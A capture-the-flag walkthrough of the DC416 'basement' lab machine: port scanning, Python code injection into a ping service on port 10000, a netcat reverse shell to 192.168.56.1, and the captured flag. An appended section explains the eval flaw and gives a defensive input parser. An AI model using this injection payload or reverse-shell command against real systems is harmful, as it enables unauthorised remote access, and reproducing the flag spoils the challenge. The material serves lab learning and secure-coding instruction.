Tuesday 24 January 2017

DC416:2016 basement challenge

Hello,

Today I would like to present a walkthrough of the dc416-2016-basement challenge.

Nmap port scanning.

Looking for our target, we discovered that the machine has been assigned the IP address 192.168.253.30.

Now, let's check what kind of services our target is running.

OK, the nmap scan discovered 4 open ports. We can see that the target uses port 8080 as an HTTP proxy. Hmmm, interesting.

Let's begin our penetration test with HTTP on port 80.

I ran DirBuster, but it didn't find anything interesting or useful... So let's check what is hosted on port 10000.

Hmmm, maybe we should try playing with it via netcat?

The service on port 10000 is probably running something like ping -c [number of packets] 127.0.0.1.

Maybe we can inject a command to obtain a reverse shell.
To do that, we have to import os.system, so let's do that!

Very good, we executed the id command on the victim's OS.

We are able to obtain a reverse shell using __import__('os').system('nc -nv 192.168.56.1 53 -e /bin/sh')

Excellent! We have got a limited shell.
jack@basement:~$ ls
ls
flag.txt  ping.py  run_ping.sh
jack@basement:~$ cat flag.txt
cat flag.txt
flag{j4cks_t0t4L_l4cK_0f_$uRpr1sE}
Good :)
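
The payload above works because the service evaluates what it receives as Python instead of parsing a number. The following is an added example, not the challenge's ping.py and not code from the original post: it assumes the flaw is Python 2's input() (which is eval(raw_input())) and shows that unsafe parsing beside a strict parser; the function names and MAX_PACKETS are hypothetical.

```python
import re

MAX_PACKETS = 10  # assumed limit, not taken from the challenge
COUNT_RE = re.compile(r"[0-9]{1,2}")

def parse_count_unsafe(text):
    # Assumed flaw: the value is evaluated (Python 2's input() does
    # eval(raw_input())), so any expression the client sends is executed.
    return eval(text)

def parse_count_safe(text):
    """Return the packet count, or raise ValueError for anything else."""
    text = text.strip()
    if not COUNT_RE.fullmatch(text):
        raise ValueError("packet count must be 1-2 decimal digits")
    count = int(text)
    if not 1 <= count <= MAX_PACKETS:
        raise ValueError("packet count out of range")
    return count

def build_ping_argv(text):
    # An argv list for subprocess.run(argv): no shell parses the value.
    return ["ping", "-c", str(parse_count_safe(text)), "127.0.0.1"]

def triage(lines):
    """Label each received line so rejected input can be logged."""
    results = []
    for line in lines:
        try:
            results.append(("accepted", build_ping_argv(line)))
        except ValueError as exc:
            results.append(("rejected", str(exc)))
    return results

# Constructed sample input: one normal request, one arithmetic expression,
# and the expression form shown in the walkthrough.
SAMPLES = ["3\n", "2+1\n", "__import__('os').system('id')\n"]

if __name__ == "__main__":
    for line, result in zip(SAMPLES, triage(SAMPLES)):
        print(repr(line), "->", result)
```

The unsafe parser turns "2+1" into 3, which is the sign that input is being evaluated; the strict parser rejects both that and the __import__ expression before anything is executed.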